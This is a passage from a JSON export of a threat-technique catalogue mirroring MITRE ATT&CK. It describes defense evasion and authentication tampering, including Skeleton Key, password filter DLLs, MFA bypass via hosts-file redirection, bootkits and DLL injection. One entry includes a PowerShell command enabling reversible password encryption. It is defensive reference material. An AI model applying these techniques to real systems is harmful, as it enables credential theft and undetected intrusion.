"tags": "Defense Evasion,\r\nscheduled tasks,\r\nscheduled tasks,\r\nmimic legitimate task,\r\nmimic legitimate service,\r\nAPT-C-36,\r\nAPT29,\r\nAPT32,\r\nAPT41,",
"modification_date": "2023-10-04T10:42:15.739000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 281,
"key": "masquerading-match-legitimate-name-or-location",
"unprotect_id": "T1036.005",
"name": "Masquerading: Match Legitimate Name or Location",
"description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\r\n\r\nAdversaries may also use the same icon of the file they are trying to mimic.",
"resources": "https://attack.mitre.org/techniques/T1036/005/",
"creation_date": "2023-02-10T01:26:42.267000Z",
"tags": "Defense Evasion,\r\ncommonly trusted directory,\r\nmimic legitimate trusted program,\r\ntrusted namespaces,\r\ntrusted filenames,\r\nmimic icon,\r\nhidden payloads,\r\nmalicious shortcuts,\r\nAPT1,\r\nAPT28,\r\nAPT29,\r\nAPT32,\r\nAPT39,\r\nAPT41,",
"modification_date": "2023-10-04T10:42:21.011000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 282,
"key": "masquerading-double-file-extension",
"unprotect_id": "T1036.007",
"name": "Masquerading: Double File Extension",
"description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.\r\n\r\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain Initial Access into a user’s system via Spearphishing Attachment then User Execution. For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.\r\n\r\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.",
"resources": "https://attack.mitre.org/techniques/T1036/007/",
"creation_date": "2023-02-10T01:32:55.344000Z",
"tags": "Defense Evasion,\r\nhidden file types,\r\nhide file types,\r\nsecondary file extension,\r\nconceal malicious file types,\r\nuser execution,\r\nhidden malware,\r\ndual-extension,",
"modification_date": "2023-10-04T10:44:00.071000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 283,
"key": "modify-authentication-process",
"unprotect_id": "T1556",
"name": "Modify Authentication Process",
"description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using Valid Accounts.\r\n\r\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.",
"resources": "https://attack.mitre.org/techniques/T1556/",
"creation_date": "2023-02-10T01:46:27.392000Z",
"tags": "Credential Access, \r\nDefense Evasion, \r\nPersistence,\r\nmodify authentication mechanisms,\r\nLocal Security Authentication Server (LSASS),\r\nSecurity Accounts Manager (SAM),\r\nbypass authentication mechanisms\r\ncredential reveal,\r\nbypass access controls,\r\nintercept private keys,",
"modification_date": "2023-10-04T10:44:13.207000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 284,
"key": "modify-authentication-process-domain-controller-authentication",
"unprotect_id": "T1556.001",
"name": "Modify Authentication Process: Domain Controller Authentication",
"description": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.\r\n\r\nMalware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: Skeleton Key). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.",
"resources": "https://attack.mitre.org/techniques/T1556/001/",
"creation_date": "2023-02-10T03:10:04.658000Z",
"tags": "Credential Access, \r\nDefense Evasion, \r\nPersistence,\r\nbypass authentication mechanisms,\r\ninject false credentials,\r\nSkeleton key,\r\nLSASS,\r\ndomain authentication,\r\nNTLM authentication,\r\nenterprise domain controller authentication,",
"modification_date": "2023-10-04T10:44:13.353000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 285,
"key": "modify-authentication-process-password-filter-dll",
"unprotect_id": "T1556.002",
"name": "Modify Authentication Process: Password Filter DLL",
"description": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.\r\n\r\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.\r\n\r\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.",
"resources": "https://attack.mitre.org/techniques/T1556/002/",
"creation_date": "2023-02-10T03:20:31.344000Z",
"tags": "Credential Access, \r\nDefense Evasion, \r\nPersistence,\r\npassword filter dynamic link libraries (DLLs),\r\ncredential harvesting,\r\nplain-text credentials,\r\nLocal Security Authority (LSA),\r\nSecurity Accounts Manager (SAM),",
"modification_date": "2023-10-04T10:44:13.502000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 286,
"key": "modify-authentication-process-reversible-encryption",
"unprotect_id": "T1556.005",
"name": "Modify Authentication Process: Reversible Encryption",
"description": "An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.\r\n\r\nIf the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:\r\n\r\nEncrypted password (G$RADIUSCHAP) from the Active Directory user-structure userParameters\r\n16 byte randomly-generated value (G$RADIUSCHAPKEY) also from userParameters\r\nGlobal LSA secret (G$MSRADIUSCHAPKEY)\r\nStatic key hardcoded in the Remote Access Subauthentication DLL (RASSFM.DLL)\r\nWith this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.\r\n\r\nAn adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory PowerShell module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to \"Windows Server 2008\" or higher. In PowerShell, an adversary may make associated changes to user settings using commands similar to Set-ADUser -AllowReversiblePasswordEncryption $true.",
"resources": "https://attack.mitre.org/techniques/T1556/005/",
"creation_date": "2023-02-10T03:25:12.537000Z",
"tags": "Credential Access, \r\nDefense Evasion, \r\nPersistence,\r\nActive Directory authentication encryption properties,\r\nAllowReversiblePasswordEncryption,\r\nG$RADIUSCHAP,\r\nG$RADIUSCHAPKEY,\r\nG$MSRADIUSCHAPKEY,\r\nRemote Access Subauthentication DLL (RASSFM.DLL),\r\nreproduce encryption key,\r\npassword decryption,\r\nLocal Group Policy Editor,\r\nFine-Grained Password Policy (FGPP),",
"modification_date": "2023-10-04T10:44:13.801000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 287,
"key": "modify-authentication-process-multi-factor-authentication",
"unprotect_id": "T1556.006",
"name": "Modify Authentication Process: Multi-Factor Authentication",
"description": "Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.\r\n\r\nOnce adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as Multi-Factor Authentication Request Generation, adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.\r\n\r\nFor example, modifying the Windows hosts file (C:\\windows\\system32\\drivers\\etc\\hosts) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a \"fail open\" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. \r\n\r\nDepending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.",
"resources": "https://attack.mitre.org/techniques/T1556/006/",
"creation_date": "2023-02-10T03:28:56.884000Z",
"tags": "Credential Access, \r\nDefense Evasion, \r\nPersistence,\r\ndisable multi-factor authentication (MFA),\r\nAzure AD Conditional Access Policies,\r\npatching MFA programs,\r\npatching MFA configurations,",
"modification_date": "2023-10-04T10:44:13.951000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 288,
"key": "modify-authentication-process-hybrid-identity",
"unprotect_id": "T1556.007",
"name": "Modify Authentication Process: Hybrid Identity",
"description": "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.\r\n\r\nMany organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD:\r\n\r\nPassword Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud\r\nPass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory\r\nActive Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD\r\nAD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges.\r\n\r\nBy modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the AzureADConnectAuthenticationAgentService process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials. In environments using AD FS, an adversary may edit the Microsoft.IdentityServer.Servicehost configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.\r\n\r\nIn some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.",
"resources": "https://attack.mitre.org/techniques/T1556/007/",
"creation_date": "2023-02-10T03:35:30.421000Z",
"tags": "Credential Access, \r\nDefense Evasion, \r\nPersistence,\r\nbackdoor cloud authentication processes,\r\nbypass authentication mechanisms, \r\nmodifying authentication processes,\r\naccess credentials, \r\nenable persistent access,\r\nActive Directory, \r\nAzure AD,\r\nPassword Hash Synchronization (PHS),\r\nPass Through Authentication (PTA),\r\nActive Directory Federation Services (ADFS),\r\nAzureADConnectAuthenticationAgentService,\r\nMicrosoft.IdentityServer.Servicehost configuration file,\r\nhybrid identity authentication process,\r\ncredentia harvesting,\r\nAPT29,\r\ninject malicious DLL,",
"modification_date": "2023-10-04T10:42:27.062000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 289,
"key": "modify-registry",
"unprotect_id": "T1112",
"name": "Modify Registry",
"description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\r\n\r\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\r\n\r\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via Reg or other utilities using the Win32 API. Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. \r\n\r\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. Often Valid Accounts are required, along with access to the remote system's SMB/Windows Admin Shares for RPC communication.",
"resources": "https://attack.mitre.org/techniques/T1112/",
"creation_date": "2023-02-10T03:43:23.404000Z",
"tags": "Defense Evasion,\r\nAPT19,\r\nAPT32,\r\nAPT38,\r\nAPT41,\r\nWindows Registry,\r\nRegistry keys,\r\nRegistry modifications,\r\npseudo-hidden keys,\r\nremote Registry service,\r\nUAC bypass,",
"modification_date": "2023-10-04T10:44:14.208000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 290,
"key": "obfuscated-files-or-information-binary-padding",
"unprotect_id": "T1027.001",
"name": "Obfuscated Files or Information: Binary Padding",
"description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.\r\n\r\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures. The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware. Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.",
"resources": "https://attack.mitre.org/techniques/T1027/001/",
"creation_date": "2023-02-15T22:53:34.910000Z",
"tags": "Defense Evasion,\r\nchecksum manipulation,\r\navoid hash-based blocklists, \r\navoid static anti-virus signatures,\r\nappend junk data,\r\nappend random binary data,\r\nmaximum file size,\r\nAPT29,\r\nAPT32,\r\nmaximum file size,",
"modification_date": "2023-10-04T10:44:11.581000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 291,
"key": "obfuscated-files-or-information-software-packing",
"unprotect_id": "T1027.002",
"name": "Obfuscated Files or Information: Software Packing",
"description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.\r\n\r\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses",
"resources": "https://attack.mitre.org/techniques/T1027/002/",
"creation_date": "2023-02-15T22:57:33.440000Z",
"tags": "Defense Evasion,\r\ncompressing executables,\r\nencrypting executables,\r\navoiding signature-based detection,\r\npacked payloads,\r\nobfuscating malicious payloads,\r\nMPRESS,\r\nUPX,\r\nVirtual machine software protection,\r\nAPT29,\r\nAPT3,\r\nAPT38,\r\nAPT39,",
"modification_date": "2023-10-04T10:44:14.775000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 292,
"key": "obfuscated-files-or-information-steganography",
"unprotect_id": "T1027.003",
"name": "Obfuscated Files or Information: Steganography",
"description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\r\n\r\nDuqu was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.\r\n\r\nBy the end of 2017, a threat group used Invoke-PSImage to hide PowerShell commands in an image file (.png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.",
"resources": "https://attack.mitre.org/techniques/T1027/003/",
"creation_date": "2023-02-15T23:01:45.898000Z",
"tags": "Defense Evasion,\r\nconceal information,\r\nconceal payloads,\r\nInvoke-PSImage,\r\nAPT37,\r\nhidden malicious portable executable,\r\nembedded image files,\r\nobfuscated files,",
"modification_date": "2023-10-04T10:44:14.469000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 293,
"key": "obfuscated-files-or-information-compile-after-delivery",
"unprotect_id": "T1027.004",
"name": "Obfuscated Files or Information: Compile After Delivery",
"description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.\r\n\r\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a Phishing. Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.",
"resources": "https://attack.mitre.org/techniques/T1027/004/",
"creation_date": "2023-02-15T23:04:18.334000Z",
"tags": "Defense Evasion,\r\nuncompiled code,\r\ncompile malicious code,\r\nexecute malicious code,\r\nencrypted malicious code,",
"modification_date": "2023-10-04T10:44:13.657000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 294,
"key": "obfuscated-files-or-information-indicator-removal-from-tools",
"unprotect_id": "T1027.005",
"name": "Obfuscated Files or Information: Indicator Removal from Tools",
"description": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\r\n\r\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.",
"resources": "https://attack.mitre.org/techniques/T1027/005/",
"creation_date": "2023-02-15T23:07:19.194000Z",
"tags": "Defense Evasion,\r\nmalicious file modification,\r\npayload modification,\r\nsignature evasion,\r\nunique hash,\r\nAPT3,",
"modification_date": "2023-10-04T10:42:26.127000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 295,
"key": "obfuscated-files-or-information-html-smuggling",
"unprotect_id": "T1027.006",
"name": "Obfuscated Files or Information: HTML Smuggling",
"description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.\r\n\r\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. Deobfuscate/Decode Files or Information), potentially bypassing content filters.\r\n\r\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.",
"resources": "https://attack.mitre.org/techniques/T1027/006/",
"creation_date": "2023-02-15T23:15:42.900000Z",
"tags": "Defense Evasion,\r\nbypass content filters,\r\nmalicious HTML files,\r\nMIME files,\r\nHTML5 download attribute,\r\nJavaScript Blobs,\r\ntext/plain, \r\ntext/html,\r\nData URLs,\r\nmsSaveBlob,\r\nAPT29,",
"modification_date": "2023-10-04T10:44:14.626000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 296,
"key": "obfuscated-files-or-information-dynamic-api-resolution",
"unprotect_id": "T1027.007",
"name": "Obfuscated Files or Information: Dynamic API Resolution",
"description": "Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various Native API functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.\r\n\r\nAPI functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.\r\n\r\nTo avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to Software Packing, dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.\r\n\r\nVarious methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as GetProcAddress() and LoadLibrary(). These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of Deobfuscate/Decode Files or Information during execution)",
"resources": "https://attack.mitre.org/techniques/T1027/007/",
"creation_date": "2023-02-15T23:19:52.827000Z",
"tags": "Defense Evasion,\r\nobfuscate API functions,\r\ndynamic API resolution,\r\nconceal malicious functionality,\r\nimport address table (IAT),\r\nmanipulate file signatures,\r\nGetProcAddress(),\r\nLoadLibrary(),\r\nEncrypt hashes,\r\nDeobfuscate files,\r\nDecode files,\r\ndynamic Windows hashing algorithm,",
"modification_date": "2023-10-04T10:42:41.519000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 297,
"key": "obfuscated-files-or-information-stripped-payloads",
"unprotect_id": "T1027.008",
"name": "Obfuscated Files or Information: Stripped Payloads",
"description": "Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s linker when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.\r\n\r\nAdversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads",
"resources": "https://attack.mitre.org/techniques/T1027/008/",
"creation_date": "2023-02-15T23:22:37.393000Z",
"tags": "Defense Evasion,\r\nRemove human readable information,\r\noperating system linker,\r\nobfuscate malicious code,",
"modification_date": "2023-10-04T10:42:32.815000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 298,
"key": "obfuscated-files-or-information-embedded-payloads",
"unprotect_id": "T1027.009",
"name": "Obfuscated Files or Information: Embedded Payloads",
"description": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to Subvert Trust Controls by not impacting execution controls such as digital signatures and notarization tickets.\r\n\r\nAdversaries may embed payloads in various file formats to hide payloads. This is similar to Steganography, though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.\r\n\r\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary. Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.\r\n\r\nEmbedded content may also be used as Process Injection payloads used to infect benign system processes. These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.",
"resources": "https://attack.mitre.org/techniques/T1027/009/",
"creation_date": "2023-02-15T23:33:22.130000Z",
"tags": "Defense Evasion,\r\nconceal malicious code,\r\nobfuscate malicious payloads,\r\nSubvert Trust Controls,\r\nembedded payloads,\r\nnested payloads,\r\nProcess Injection payloads,\r\nencrypted communications module,",
"modification_date": "2023-10-04T10:42:36.663000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 299,
"key": "pre-os-boot-system-firmware",
"unprotect_id": "T1542.001",
"name": "Pre-OS Boot: System Firmware",
"description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.\r\n\r\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.",
"resources": "https://attack.mitre.org/techniques/T1542/001/",
"creation_date": "2023-02-15T23:41:24.674000Z",
"tags": "Persistence, \r\nDefense Evasion,\r\nBIOS (Basic Input/Output System),\r\nUnified Extensible Firmware Interface (UEFI),\r\nExtensible Firmware Interface (EFI),\r\noverwrite system firmware,\r\nmalicious firmware updates,\r\nrootkit,\r\nBIOS modification,",
"modification_date": "2023-10-04T10:44:06.969000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 300,
"key": "pre-os-boot-component-firmware",
"unprotect_id": "T1542.002",
"name": "Pre-OS Boot: Component Firmware",
"description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\r\n\r\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.",
"resources": "https://attack.mitre.org/techniques/T1542/002/",
"creation_date": "2023-02-15T23:58:24.350000Z",
"tags": "Persistence, \r\nDefense Evasion,\r\nmodify component firmware,\r\nexecute adversary code,\r\npatching legitimate device firmware,\r\noverwrite firmware,",
"modification_date": "2023-10-04T10:44:15.571000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 301,
"key": "pre-os-boot-bootkit",
"unprotect_id": "T1542.003",
"name": "Pre-OS Boot: Bootkit",
"description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\r\n\r\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. \r\n\r\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.",
"resources": "https://attack.mitre.org/techniques/T1542/003/",
"creation_date": "2023-02-16T00:02:44.948000Z",
"tags": "Persistence, \r\nDefense Evasion,\r\nboot sector modification,\r\nMaster Boot Record (MBR),\r\nVolume Boot Record (VBR),\r\nboot loader,\r\nboot drive overwrite,\r\nAPT28,\r\nAPT41,\r\nransomware,",
"modification_date": "2023-10-04T10:42:43.557000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 302,
"key": "process-injection-dynamic-link-library-injection",
"unprotect_id": "T1055.001",
"name": "Process Injection: Dynamic-link Library Injection",
"description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). \r\n\r\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).\r\n\r\nAnother variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's AddressOfEntryPoint before starting a new thread in the target process. This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.\r\n\r\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.",
"resources": "https://attack.mitre.org/techniques/T1055/001/",
"creation_date": "2023-02-16T00:21:00.773000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nexecuting arbitrary code in live process,\r\nnative Windows API calls,\r\nVirtualAllocEx, \r\nWriteProcessMemory,\r\nCreateRemoteThread,\r\nLoadLibrary,\r\nreflective DLL injection,\r\nself-mapping DLL,\r\nModule Stomping,\r\nModule Overloading,\r\nDLL Hollowing,\r\nconceal injected code,\r\nAddressOfEntryPoint,\r\nmalicious injection,\r\nencrypted DLLs,",
"modification_date": "2023-10-04T10:44:15.834000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 303,
"key": "process-injection-portable-executable-injection",
